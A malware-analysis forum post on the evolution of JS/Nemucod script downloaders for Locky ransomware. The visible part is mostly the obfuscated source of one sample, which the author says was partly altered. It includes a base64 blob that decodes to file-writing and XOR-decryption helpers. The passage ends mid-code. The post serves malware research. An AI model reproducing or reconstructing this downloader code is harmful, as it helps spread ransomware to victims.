Malware Analysis 8 x JS/Nemucod - evolution of same family - Locky .thor downloaders - Oct,27 to Nov,29 - updated

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From : https://malwaretips.com/threads/27-10-2016-8.64887/
Thanks to @Der.Reisende

EDITED : added at the end some changes on new samples :
- 04/11/2016 (dd/mm/yy)
- 08/11/2016 (dd/mm/yy)
- 29/11/2016 (dd/mm/yy)

5190512.wsf
27991851_Invoice.jse
7171450.wsf

From : https://malwaretips.com/threads/28-10-2016-10.64919/
Thanks to @silversurfer

FAX_0780.wsf

Why this samples ?

I already analyzed similar script-based donwloader, (several months ago), and will show you how they have improved (or not) the way they hide important data.
This 4 samples used exactly the same obfuscation, only deobfuscated data may change (urls and payload names)

WARNING : See my previous analysis to understand this one, I will only show the "evolution" (or not) from last versions
As examples :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
https://malwaretips.com/threads/deo...4-malware-vault-wsf-dropper-js_nemucod.62938/

I just remember you how work a nemucod downloader :

- download an obfuscated payload, that is then deobfuscated using several functions :

2 x decipher, deobfuscation with XOR part, etc​
1 ) 5190512.wsf : What it looks like :

Some part has been modified just to avoid copy-past => save => run => infection :oops:
var Maze = {

/**
* @returns {Array} a copy of a random direction ordering
*/
dirs: function() {
return Maze.shuffle(Maze.DIRS.slice(0));
}
};
/**
* @param {Array} array
* @returns {Array} array
*/
Maze.shuffle = function(array) {
var counter = array.length;
while (counter > 0) {

var tmp = array[counter];
array[counter] = array[index];
array[index] = tmp;
}
return array;
};

var vlumpelch = 4;

var nazadposmotrishvdrugzanzibarEmptyVara = "571";
Maze.random = function(array) {
var i = Math.floor(Math.random() * array.length);
if (i === array.length - 1) {
return array.pop();
} else {
var element = array;
array = array.pop();
return element;
}
};

String.prototype.Zhido = function(a1a,b2b) {
return this["re"+"pl"+"ac"+"e"](a1a, b2b);}

var mercedesbenzzMEGARAA = new Array(-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-95+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-94+vlumpelch*2,-105+vlumpelch*2,-104+vlumpelch*2,-103+vlumpelch*2,-102+vlumpelch*2,-101+vlumpelch*2,-100+vlumpelch*2,-99+vlumpelch*2,-98+vlumpelch*2,-97+vlumpelch*2,-96+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-157+vlumpelch*2,-156+vlumpelch*2,-155+vlumpelch*2,-154+vlumpelch*2,-153+vlumpelch*2,-152+vlumpelch*2,-151+vlumpelch*2,-150+vlumpelch*2,-149+vlumpelch*2,-148+vlumpelch*2,-147+vlumpelch*2,-146+vlumpelch*2,-145+vlumpelch*2,-144+vlumpelch*2,-143+vlumpelch*2,-142+vlumpelch*2,-141+vlumpelch*2,-140+vlumpelch*2,-139+vlumpelch*2,-138+vlumpelch*2,-137+vlumpelch*2,-136+vlumpelch*2,-135+vlumpelch*2,-134+vlumpelch*2,-133+vlumpelch*2,-132+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-131+vlumpelch*2,-130+vlumpelch*2,-129+vlumpelch*2,-128+vlumpelch*2,-127+vlumpelch*2,-126+vlumpelch*2,-125+vlumpelch*2,-124+vlumpelch*2,-123+vlumpelch*2,-122+vlumpelch*2,-121+vlumpelch*2,-120+vlumpelch*2,-119+vlumpelch*2,-118+vlumpelch*2,-117+vlumpelch*2,-116+vlumpelch*2,-115+vlumpelch*2,-114+vlumpelch*2,-113+vlumpelch*2,-112+vlumpelch*2,-111+vlumpelch*2,-110+vlumpelch*2,-109+vlumpelch*2,-108+vlumpelch*2,-107+vlumpelch*2,-106+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2
);

var nazadposmotrishvdrugzanzibarREPONAFT = {'77' : '','U': 'S', ':': '.', '3IKSA': 'X', '348':'','571':'', 'UPONA':'pons','1000':'r'};

var abbida = 'fromCharCode';
var nazadposmotrishvdrugzanzibar5lololosh="l";

nazadposmotrishvdrugzanzibarREPONAFT['88'] = '';

function nazadposmotrishvdrugzanzibar5achievment(nazadposmotrishvdrugzanzibar5bidttt){if(nazadposmotrishvdrugzanzibar5bidttt==1){return 2;}else{return 17;}
return 3;};
function nazadposmotrishvdrugzanzibar5misterdenisk(mercedesbenzzVLUMAHx, mercedesbenzzVLUMAHy) {
mercedesbenzzVLUMAHx = DDmercedesbenzzVLUMAH * mercedesbenzzVLUMAHddd;
mercedesbenzzVLUMAHy = mercedesbenzzVLUMAHZZ / 801;
};
function nazadposmotrishvdrugzanzibar5center(nazadposmotrishvdrugzanzibar5rivulet) {
request = nazadposmotrishvdrugzanzibar5rivulet;
for (var nazadposmotrishvdrugzanzibar5XCOP in nazadposmotrishvdrugzanzibarREPONAFT){
request = request['replace'](nazadposmotrishvdrugzanzibar5XCOP, nazadposmotrishvdrugzanzibarREPONAFT[nazadposmotrishvdrugzanzibar5XCOP]);}
return request;
};

var Franch = "eng";
var fshisr = 0xff;

function nikeFootballAir23 (kuloma) {nazadposmotrishvdrugzanzibarXCOP = 0;
var nazadposmotrishvdrugzanzibarddDccC1, nazadposmotrishvdrugzanzibarddDccC2, nazadposmotrishvdrugzanzibarc3, nazadposmotrishvdrugzanzibarc4;

var nazadposmotrishvdrugzanzibarout = "";

var nazadposmotrishvdrugzanzibar5nugash= kuloma["replace"](/WEAGLEWEAGLE/g, '');

var nazadposmotrishvdrugzanzibarlen = nazadposmotrishvdrugzanzibar5sud(nazadposmotrishvdrugzanzibar5nugash);

while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen) {
do {
nazadposmotrishvdrugzanzibarddDccC1 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibar5nugash["charCodeAt"](nazadposmotrishvdrugzanzibarXCOP++) & fshisr];
} while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarddDccC1 == -1);

if (nazadposmotrishvdrugzanzibarddDccC1 == -1)
break;
var nazadposmotrishvdrugzanzibardodo = false;
do {
nazadposmotrishvdrugzanzibarddDccC2 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++) & fshisr];
nazadposmotrishvdrugzanzibardodo = nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarddDccC2 == 2-3;
} while (nazadposmotrishvdrugzanzibardodo);
if (nazadposmotrishvdrugzanzibarddDccC2 +1== 0)
break;

nazadposmotrishvdrugzanzibarout += String[abbida]((nazadposmotrishvdrugzanzibarddDccC1 << 2) | ((nazadposmotrishvdrugzanzibarddDccC2 & 0x30) >> 4));
var nazadposmotrishvdrugzanzibardodo2 = false;
do {
nazadposmotrishvdrugzanzibarc3 = nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++) & 0xff;

if (nazadposmotrishvdrugzanzibarc3 == 10*6+0.5*2)
return nazadposmotrishvdrugzanzibarout;

nazadposmotrishvdrugzanzibarc3 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibarc3];
nazadposmotrishvdrugzanzibardodo2 = nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarc3 == -1
} while (nazadposmotrishvdrugzanzibardodo2);

if (nazadposmotrishvdrugzanzibarc3 == -1)
break;

nazadposmotrishvdrugzanzibarout += String["fromCharCode"](((nazadposmotrishvdrugzanzibarddDccC2 & 0XF) << 4) | ((nazadposmotrishvdrugzanzibarc3 & 0x3c) >> 2));

do {
nazadposmotrishvdrugzanzibarc4 = nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++);
nazadposmotrishvdrugzanzibarc4 = nazadposmotrishvdrugzanzibarc4 & fshisr;
if (nazadposmotrishvdrugzanzibarc4 == 61)
return nazadposmotrishvdrugzanzibarout;

nazadposmotrishvdrugzanzibarc4 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibarc4];
} while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarc4 == -1);

if (nazadposmotrishvdrugzanzibarc4 == -1)
break;
nazadposmotrishvdrugzanzibarout += String[abbida](((nazadposmotrishvdrugzanzibarc3 & 0x03) << 6) | nazadposmotrishvdrugzanzibarc4);
}

return nazadposmotrishvdrugzanzibarout;
};

function encodeHex(bytes) {
var s = '';
for (;;) {
var b = bytes;
if (b < 16) c = '0' + c;
s += c;
}
return s;
}


function bytesOf (x) {
x = Math.floor(x);
var bytes = [];

return bytes;
}

var mercedesbenzzVITK_OBLOM, mercedesbenzzMEGARAAHO = mercedesbenzzMEGARAA.length;
for (mercedesbenzzVITK_OBLOM= 0; mercedesbenzzVITK_OBLOM < mercedesbenzzMEGARAAHO; ++mercedesbenzzVITK_OBLOM) {

mercedesbenzzMEGARAA[mercedesbenzzVITK_OBLOM] = mercedesbenzzMEGARAA[mercedesbenzzVITK_OBLOM]+157 - vlumpelch*2;
}
var nazadposmotrishvdrugzanzibar5DRUZA = 17* (221-4)*(44-4-40);


var nazadposmotrishvdrugzanzibar5TRUEFALSE=("cewefW" + WScript =="cewefW" + nikeFootballAir23("V2WEAGLEWEAGLElWEAGLEWEAGLEuZG93cyBTY3JpcHQgSG9zdA=WEAGLEWEAGLE=") )&&typeof(nazadposmotrishvdrugzanzibar5GzEAPd)==="undefined";
var nazadposmotrishvdrugzanzibar5weasel = ""+"E"+"";
var nazadposmotrishvdrugzanzibar5lidgen = nikeFootballAir23("QWN0aXZlWE9iamVjdAWEAGLEWEAGLE=WEAGLEWEAGLE=WEAGLEWEAGLE");
var nazadposmotrishvdrugzanzibar5chosen = Math.round(0.7 * 2 - 0.4);
var VGRA1,VGRA3,VGRA4,VGRA5,VGRA6, nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar23;

var nazadposmotrishvdrugzanzibar5LUCIODOR = nikeFootballAir23_("VkdSQTEgPSBmdW5jdGlvbiAoVkdSQTkpDQogew0KIHZhciBWR1JBMj1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogVkdSQTJbInR5cGUiXSA9IDI7DQogVkdSQTJbIkNoYXJzZXQiXSA9IDQzNzsNCiBWR1JBMlsib3BlbiJdKCk7DQogVkdSQTJbIkxvYWRGcm9tRmlsZSJdKFZHUkE5KTsNCiB2YXIgVkdSQTEwPVZHUkEyWyJSZWFkVGV4dCJdOw0KIFZHUkEyWyJjbG9zZSJdKCk7DQogcmV0dXJuIFZHUkEzKFZHUkExMCk7DQp9Ow0KVkdSQTMgPSBmdW5jdGlvbiAoVkdSQTEwKQ0KIHsgDQp2YXIgdDE9bmV3IEFycmF5KCk7DQp0MVsweEM3XSA9IDB4ODA7dDFbMHhGQ10gPSAweDgxO3QxWzB4RTldID0gMHg4Mjt0MVsweEUyXSA9IDB4ODM7dDFbMHhFNF0gPSAweDg0O3QxWzB4RTBdID0gMHg4NTt0MVsweEU1XSA9IDB4ODY7dDFbMHhFN10gPSAweDg3O3QxWzB4RUFdID0gMHg4ODt0MVsweEVCXSA9IDB4ODk7dDFbMHhFOF0gPSAweDhBO3QxWzB4RUZdID0gMHg4Qjt0MVsweEVFXSA9IDB4OEM7dDFbMHhFQ10gPSAweDhEO3QxWzB4QzRdID0gMHg4RTt0MVsweEM1XSA9IDB4OEY7dDFbMHhDOV0gPSAweDkwO3QxWzB4RTZdID0gMHg5MTt0MVsweEM2XSA9IDB4OTI7dDFbMHhGNF0gPSAweDkzO3QxWzB4RjZdID0gMHg5NDt0MVsweEYyXSA9IDB4OTU7dDFbMHhGQl0gPSAweDk2O3QxWzB4RjldID0gMHg5Nzt0MVsweEZGXSA9IDB4OTg7dDFbMHhENl0gPSAweDk5O3QxWzB4RENdID0gMHg5QTt0MVsweEEyXSA9IDB4OUI7dDFbMHhBM10gPSAweDlDO3QxWzB4QTVdID0gMHg5RDt0MVsweDIwQTddID0gMHg5RTt0MVsweDE5Ml0gPSAweDlGO3QxWzB4RTFdID0gMHhBMDt0MVsweEVEXSA9IDB4QTE7dDFbMHhGM10gPSAweEEyO3QxWzB4RkFdID0gMHhBMzt0MVsweEYxXSA9IDB4QTQ7dDFbMHhEMV0gPSAweEE1O3QxWzB4QUFdID0gMHhBNjt0MVsweEJBXSA9IDB4QTc7dDFbMHhCRl0gPSAweEE4O3QxWzB4MjMxMF0gPSAweEE5O3QxWzB4QUNdID0gMHhBQTt0MVsweEJEXSA9IDB4QUI7dDFbMHhCQ10gPSAweEFDO3QxWzB4QTFdID0gMHhBRDt0MVsweEFCXSA9IDB4QUU7dDFbMHhCQl0gPSAweEFGO3QxWzB4MjU5MV0gPSAweEIwO3QxWzB4MjU5Ml0gPSAweEIxO3QxWzB4MjU5M10gPSAweEIyO3QxWzB4MjUwMl0gPSAweEIzO3QxWzB4MjUyNF0gPSAweEI0O3QxWzB4MjU2MV0gPSAweEI1O3QxWzB4MjU2Ml0gPSAweEI2O3QxWzB4MjU1Nl0gPSAweEI3O3QxWzB4MjU1NV0gPSAweEI4O3QxWzB4MjU2M10gPSAweEI5O3QxWzB4MjU1MV0gPSAweEJBO3QxWzB4MjU1N10gPSAweEJCO3QxWzB4MjU1RF0gPSAweEJDO3QxWzB4MjU1Q10gPSAweEJEO3QxWzB4MjU1Ql0gPSAweEJFO3QxWzB4MjUxMF0gPSAweEJGO3QxWzB4MjUxNF0gPSAweEMwO3QxWzB4MjUzNF0gPSAweEMxO3QxWzB4MjUyQ10gPSAweEMyO3QxWzB4MjUxQ10gPSAweEMzOyANCnQxWzB4MjUwMF0gPSAweEM0O3QxWzB4MjUzQ10gPSAweEM1O3QxWzB4MjU1RV0gPSAweEM2O3QxWzB4MjU1Rl0gPSAweEM3O3QxWzB4MjU1QV0gPSAweEM4O3QxWzB4MjU1NF0gPSAweEM5O3QxWzB4MjU2OV0gPSAweENBO3QxWzB4MjU2Nl0gPSAweENCO3QxWzB4MjU2MF0gPSAweENDO3QxWzB4MjU1MF0gPSAweENEO3QxWzB4MjU2Q10gPSAweENFO3QxWzB4MjU2N10gPSAweENGO3QxWzB4MjU2OF0gPSAweEQwO3QxWzB4MjU2NF0gPSAweEQxO3QxWzB4MjU2NV0gPSAweEQyO3QxWzB4MjU1OV0gPSAweEQzO3QxWzB4MjU1OF0gPSAweEQ0O3QxWzB4MjU1Ml0gPSAweEQ1O3QxWzB4MjU1M10gPSAweEQ2O3QxWzB4MjU2Ql0gPSAweEQ3O3QxWzB4MjU2QV0gPSAweEQ4O3QxWzB4MjUxOF0gPSAweEQ5O3QxWzB4MjUwQ10gPSAweERBO3QxWzB4MjU4OF0gPSAweERCO3QxWzB4MjU4NF0gPSAweERDO3QxWzB4MjU4Q10gPSAweEREO3QxWzB4MjU5MF0gPSAweERFO3QxWzB4MjU4MF0gPSAweERGO3QxWzB4M0IxXSA9IDB4RTA7dDFbMHhERl0gPSAweEUxO3QxWzB4MzkzXSA9IDB4RTI7dDFbMHgzQzBdID0gMHhFMzt0MVsweDNBM10gPSAweEU0O3QxWzB4M0MzXSA9IDB4RTU7dDFbMHhCNV0gPSAweEU2O3QxWzB4M0M0XSA9IDB4RTc7dDFbMHgzQTZdID0gMHhFODt0MVsweDM5OF0gPSAweEU5O3QxWzB4M0E5XSA9IDB4RUE7dDFbMHgzQjRdID0gMHhFQjsgDQp0MVsweDIyMUVdID0gMHhFQzt0MVsweDNDNl0gPSAweEVEO3QxWzB4M0I1XSA9IDB4RUU7dDFbMHgyMjI5XSA9IDB4RUY7dDFbMHgyMjYxXSA9IDB4RjA7dDFbMHhCMV0gPSAweEYxO3QxWzB4MjI2NV0gPSAweEYyO3QxWzB4MjI2NF0gPSAweEYzO3QxWzB4MjMyMF0gPSAweEY0O3QxWzB4MjMyMV0gPSAweEY1O3QxWzB4RjddID0gMHhGNjt0MVsweDIyNDhdID0gMHhGNzt0MVsweEIwXSA9IDB4Rjg7dDFbMHgyMjE5XSA9IDB4Rjk7dDFbMHhCN10gPSAweEZBO3QxWzB4MjIxQV0gPSAweEZCO3QxWzB4MjA3Rl0gPSAweEZDO3QxWzB4QjJdID0gMHhGRDt0MVsweDI1QTBdID0gMHhGRTt0MVsweEEwXSA9IDB4RkY7DQogdmFyIHJlc3VsdEFycmF5PW5ldyBBcnJheSgpOw0KIGZvciAodmFyIFRqPTA7IFRqIDwgVkdSQTEwWyJsZW5ndGgiXTsgVGorKykNCiAgew0KIHZhciBPVmM5PVZHUkExMFsiY2hhckNvZGVBdCJdKFRqKTsNCiBpZiAoT1ZjOSA8IDEyOCkNCiAge3ZhciBISWkzPU9WYzk7fQ0KIGVsc2UNCiAge3ZhciBISWkzPXQxW09WYzldO30NCiByZXN1bHRBcnJheVsicHVzaCJdKEhJaTMpOw0KIH07DQogDQogcmV0dXJuIHJlc3VsdEFycmF5Ow0KfTsNClZHUkE0ID0gZnVuY3Rpb24gKFZHUkExMSkNCiB7DQogdmFyIHQyPW5ldyBBcnJheSgpOw0KIA0KdDJbMHg4MF0gPSAweDAwQzc7dDJbMHg4MV0gPSAweDAwRkM7dDJbMHg4Ml0gPSAweDAwRTk7dDJbMHg4M10gPSAweDAwRTI7dDJbMHg4NF0gPSAweDAwRTQ7dDJbMHg4NV0gPSAweDAwRTA7dDJbMHg4Nl0gPSAweDAwRTU7dDJbMHg4N10gPSAweDAwRTc7dDJbMHg4OF0gPSAweDAwRUE7dDJbMHg4OV0gPSAweDAwRUI7dDJbMHg4QV0gPSAweDAwRTg7dDJbMHg4Ql0gPSAweDAwRUY7dDJbMHg4Q10gPSAweDAwRUU7dDJbMHg4RF0gPSAweDAwRUM7dDJbMHg4RV0gPSAweDAwQzQ7dDJbMHg4Rl0gPSAweDAwQzU7dDJbMHg5MF0gPSAweDAwQzk7dDJbMHg5MV0gPSAweDAwRTY7dDJbMHg5Ml0gPSAweDAwQzY7dDJbMHg5M10gPSAweDAwRjQ7dDJbMHg5NF0gPSAweDAwRjY7dDJbMHg5NV0gPSAweDAwRjI7dDJbMHg5Nl0gPSAweDAwRkI7dDJbMHg5N10gPSAweDAwRjk7dDJbMHg5OF0gPSAweDAwRkY7dDJbMHg5OV0gPSAweDAwRDY7dDJbMHg5QV0gPSAweDAwREM7dDJbMHg5Ql0gPSAweDAwQTI7dDJbMHg5Q10gPSAweDAwQTM7dDJbMHg5RF0gPSAweDAwQTU7dDJbMHg5RV0gPSAweDIwQTc7dDJbMHg5Rl0gPSAweDAxOTI7dDJbMHhBMF0gPSAweDAwRTE7dDJbMHhBMV0gPSAweDAwRUQ7dDJbMHhBMl0gPSAweDAwRjM7dDJbMHhBM10gPSAweDAwRkE7dDJbMHhBNF0gPSAweDAwRjE7dDJbMHhBNV0gPSAweDAwRDE7dDJbMHhBNl0gPSAweDAwQUE7dDJbMHhBN10gPSAweDAwQkE7dDJbMHhBOF0gPSAweDAwQkY7dDJbMHhBOV0gPSAweDIzMTA7dDJbMHhBQV0gPSAweDAwQUM7dDJbMHhBQl0gPSAweDAwQkQ7dDJbMHhBQ10gPSAweDAwQkM7dDJbMHhBRF0gPSAweDAwQTE7dDJbMHhBRV0gPSAweDAwQUI7dDJbMHhBRl0gPSAweDAwQkI7dDJbMHhCMF0gPSAweDI1OTE7dDJbMHhCMV0gPSAweDI1OTI7dDJbMHhCMl0gPSAweDI1OTM7dDJbMHhCM10gPSAweDI1MDI7dDJbMHhCNF0gPSAweDI1MjQ7dDJbMHhCNV0gPSAweDI1NjE7dDJbMHhCNl0gPSAweDI1NjI7dDJbMHhCN10gPSAweDI1NTY7dDJbMHhCOF0gPSAweDI1NTU7dDJbMHhCOV0gPSAweDI1NjM7dDJbMHhCQV0gPSAweDI1NTE7dDJbMHhCQl0gPSAweDI1NTc7dDJbMHhCQ10gPSAweDI1NUQ7dDJbMHhCRF0gPSAweDI1NUM7dDJbMHhCRV0gPSAweDI1NUI7dDJbMHhCRl0gPSAweDI1MTA7dDJbMHhDMF0gPSAweDI1MTQ7dDJbMHhDMV0gPSAweDI1MzQ7dDJbMHhDMl0gPSAweDI1MkM7dDJbMHhDM10gPSAweDI1MUM7dDJbMHhDNF0gPSAweDI1MDA7dDJbMHhDNV0gPSAweDI1M0M7dDJbMHhDNl0gPSAweDI1NUU7dDJbMHhDN10gPSAweDI1NUY7dDJbMHhDOF0gPSAweDI1NUE7dDJbMHhDOV0gPSAweDI1NTQ7dDJbMHhDQV0gPSAweDI1Njk7dDJbMHhDQl0gPSAweDI1NjY7dDJbMHhDQ10gPSAweDI1NjA7dDJbMHhDRF0gPSAweDI1NTA7dDJbMHhDRV0gPSAweDI1NkM7dDJbMHhDRl0gPSAweDI1Njc7dDJbMHhEMF0gPSAweDI1Njg7dDJbMHhEMV0gPSAweDI1NjQ7dDJbMHhEMl0gPSAweDI1NjU7dDJbMHhEM10gPSAweDI1NTk7dDJbMHhENF0gPSAweDI1NTg7dDJbMHhENV0gPSAweDI1NTI7dDJbMHhENl0gPSAweDI1NTM7dDJbMHhEN10gPSAweDI1NkI7dDJbMHhEOF0gPSAweDI1NkE7dDJbMHhEOV0gPSAweDI1MTg7dDJbMHhEQV0gPSAweDI1MEM7dDJbMHhEQl0gPSAweDI1ODg7dDJbMHhEQ10gPSAweDI1ODQ7dDJbMHhERF0gPSAweDI1OEM7dDJbMHhERV0gPSAweDI1OTA7dDJbMHhERl0gPSAweDI1ODA7dDJbMHhFMF0gPSAweDAzQjE7dDJbMHhFMV0gPSAweDAwREY7dDJbMHhFMl0gPSAweDAzOTM7dDJbMHhFM10gPSAweDAzQzA7dDJbMHhFNF0gPSAweDAzQTM7dDJbMHhFNV0gPSAweDAzQzM7dDJbMHhFNl0gPSAweDAwQjU7dDJbMHhFN10gPSAweDAzQzQ7dDJbMHhFOF0gPSAweDAzQTY7dDJbMHhFOV0gPSAweDAzOTg7dDJbMHhFQV0gPSAweDAzQTk7dDJbMHhFQl0gPSAweDAzQjQ7dDJbMHhFQ10gPSAweDIyMUU7dDJbMHhFRF0gPSAweDAzQzY7dDJbMHhFRV0gPSAweDAzQjU7dDJbMHhFRl0gPSAweDIyMjk7dDJbMHhGMF0gPSAweDIyNjE7dDJbMHhGMV0gPSAweDAwQjE7dDJbMHhGMl0gPSAweDIyNjU7dDJbMHhGM10gPSAweDIyNjQ7dDJbMHhGNF0gPSAweDIzMjA7dDJbMHhGNV0gPSAweDIzMjE7dDJbMHhGNl0gPSAweDAwRjc7dDJbMHhGN10gPSAweDIyNDg7dDJbMHhGOF0gPSAweDAwQjA7dDJbMHhGOV0gPSAweDIyMTk7dDJbMHhGQV0gPSAweDAwQjc7dDJbMHhGQl0gPSAweDIyMUE7dDJbMHhGQ10gPSAweDIwN0Y7dDJbMHhGRF0gPSAweDAwQjI7dDJbMHhGRV0gPSAweDI1QTA7dDJbMHhGRl0gPSAweDAwQTA7DQogDQogdmFyIEVHaj1uZXcgQXJyYXkoKTsNCiB2YXIgcmVzdWx0U3RyaW5nPSIiOw0KIHZhciBISWkzOyB2YXIgT1ZjOTsNCiBmb3IgKHZhciBUaj0wOyBUaiA8IFZHUkExMVsibGVuZ3RoIl07IFRqKyspDQogIHsNCiBISWkzPVZHUkExMVtUal07DQogaWYgKEhJaTMgPCAxMjgpIA0KICB7T1ZjOT1ISWkzO30NCiBlbHNlIA0KICB7T1ZjOT10MltISWkzXTt9DQogRUdqLnB1c2goU3RyaW5nWyJmcm9tQ2hhckNvZGUiXShPVmM5KSk7DQogfQ0KIA0KIHJlc3VsdFN0cmluZz1FR2pbImpvaW4iXSgiIik7DQogDQogcmV0dXJuIHJlc3VsdFN0cmluZzsNCn07DQpWR1JBNSA9IGZ1bmN0aW9uIChWR1JBOSwgVkdSQTExKQ0KIHsNCiB2YXIgVkdSQTI9V1NjcmlwdFsiQ3JlYXRlT2JqZWN0Il0oIkFET0RCLlN0cmVhbSIpOw0KIFZHUkEyWyJ0eXBlIl0gPSAyOw0KIFZHUkEyWyJDaGFyc2V0Il0gPSA0Mzc7IA0KIFZHUkEyWyJvcGVuIl0oKTsNCiBWR1JBMlsid3JpdGVUZXh0Il0oVkdSQTQoVkdSQTExKSk7DQogVkdSQTJbIlNhdmVUb0ZpbGUiXShWR1JBOSwgMik7DQogVkdSQTJbImNsb3NlIl0oKTsNCn07DQogDQpWR1JBNiA9IGZ1bmN0aW9uIChWR1JBNykNCiB7DQogZm9yICh2YXIgVGo9MDsgVGogPCBWR1JBN1sibGVuZ3RoIl07IFRqKyspDQogIHsNCiBWR1JBN1tUal0gXj0gVkdSQThbTWF0aC5mbG9vcihUaiAlIFZHUkE4Lmxlbmd0aCldOw0KIH0gDQogcmV0dXJuIFZHUkE3Ow0KfTsg");

var nazadposmotrishvdrugzanzibarsophos2 = "QURPRWEAGLEWEAGLEEIuU3RyZWFt";

var nazadposmotrishvdrugzanzibar5jji= "http://";
function createExitHarness (conf) {
if (!conf) conf = {};
var harness = createHarness({
autoclose: defined(conf.autoclose, false)
});

var stream = harness.createStream({ objectMode: conf.objectMode });
var es = stream.pipe(conf.stream || createDefaultStream());
if (canEmitExit) {
